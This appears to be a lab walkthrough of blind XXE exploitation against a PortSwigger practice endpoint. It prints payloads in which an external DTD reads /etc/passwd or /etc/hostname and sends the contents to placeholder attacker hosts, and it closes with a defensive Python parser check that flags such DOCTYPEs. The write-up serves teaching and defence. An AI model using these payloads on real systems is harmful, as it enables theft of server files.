Exploitation

What we did so far was just get the remote host to ping back to our Burp Collaborator, but that alone doesn't tell us how to go on and exploit this vulnerability.

  • Every attacker wants to retrieve some sort of interesting information, and with Blind XXE this can be achieved out-of-band

  • But this attack is only possible when the attacker hosts a malicious DTD on a system that they control, and then invokes that external DTD from within the in-band XXE payload

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER IP/?x=%file;'>">
%eval;
%exfiltrate;

  1. It defines an XML parameter entity called file, which contains the contents of /etc/passwd

  2. It then defines another XML parameter entity called eval, containing a dynamic declaration of a further parameter entity called exfiltrate

  3. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server, with the value of the file entity placed in the URL query string

  4. It uses the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed

  5. It uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own web server, for example at:

http://BURP-COLLABORATOR/malicious.dtd

Finally, the attacker must modify the request to contain a DOCTYPE like this:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER IP/malicious.dtd"> %xxe; ]>

That is how a malicious external DTD lets us exfiltrate something like the hostname. Let's try it in the lab.

When we try to ping back our Burp Collaborator the usual way, it doesn't work, so we'll have to find another way to get it.

Luckily, the PortSwigger labs provide us with an exploit server where we can craft and store our own payload:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/?x=%file;'>">
%eval;
%exfil;

When we store this payload, note the URL the exploit server gives us: that is the URL of our malicious DTD.

Now we can exploit it the same way as above:

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

And now when we poll the Collaborator, we see both a DNS and an HTTP interaction. Checking the HTTP request shows a GET containing the hostname:

GET /?x=<HOSTNAME>
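On the defending side, the useful question is what a parser does with the stockCheck DOCTYPE above before it ever reaches application code. The following is an added example, not code from the write-up or from PortSwigger: it uses Python's standard-library expat bindings to report the DOCTYPE, the parameter entity declaration and the exact URL a resolving parser would have fetched for %xxe;, without fetching it, and applies the usual mitigation of rejecting any request that carries a DOCTYPE at all. The sample requests are constructed, and the DTD URL is the page's own placeholder.

```python
import xml.parsers.expat as expat

# Constructed sample requests (not from the lab): the stockCheck DOCTYPE from the
# write-up above a harmless body, and a benign request with no DOCTYPE at all.
BLIND_XXE_REQUEST = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM '
    '"https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>'
    '<stockCheck><productId>1</productId></stockCheck>'
)
BENIGN_REQUEST = '<?xml version="1.0"?><stockCheck><productId>1</productId></stockCheck>'

def inspect_dtd(xml_text):
    """Parse with expat while refusing to fetch anything; report the DOCTYPE,
    every entity declaration and the URLs a resolving parser would request."""
    report = {"doctype": None, "entities": [], "fetch_attempts": [], "error": None}
    p = expat.ParserCreate()
    # Parameter-entity processing is opted into only so the fetch becomes
    # visible; the handler below answers it without opening the URL.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = {"name": name, "system_id": system_id,
                             "internal_subset": bool(has_internal_subset)}

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        report["entities"].append({"name": name, "parameter": bool(is_param),
                                   "system_id": system_id})

    def on_external_ref(context, base, system_id, public_id):
        # A parser that honours %xxe; would make the out-of-band request to the
        # attacker-controlled DTD right here. Record it, fetch nothing.
        report["fetch_attempts"].append(system_id)
        return 1  # tell expat the reference is handled so parsing continues

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(xml_text, True)
    except expat.ExpatError as exc:
        report["error"] = str(exc)
    return report

def should_reject(xml_text):
    """Mitigation for an endpoint that never needs a DTD: refuse any request
    carrying a DOCTYPE, which also blocks every external parameter entity."""
    return inspect_dtd(xml_text)["doctype"] is not None
```

Logging the recorded fetch_attempts URL from a front-end filter is also a cheap detection signal, since a legitimate stock-check request has no reason to reference any external DTD.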

Note

/etc/passwd doesn't work because of the newline characters in the file: some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL, and a newline fails that check.

  • It is best to use FTP:// instead of HTTP://

That's why we use a file without newlines, like /etc/hostname.
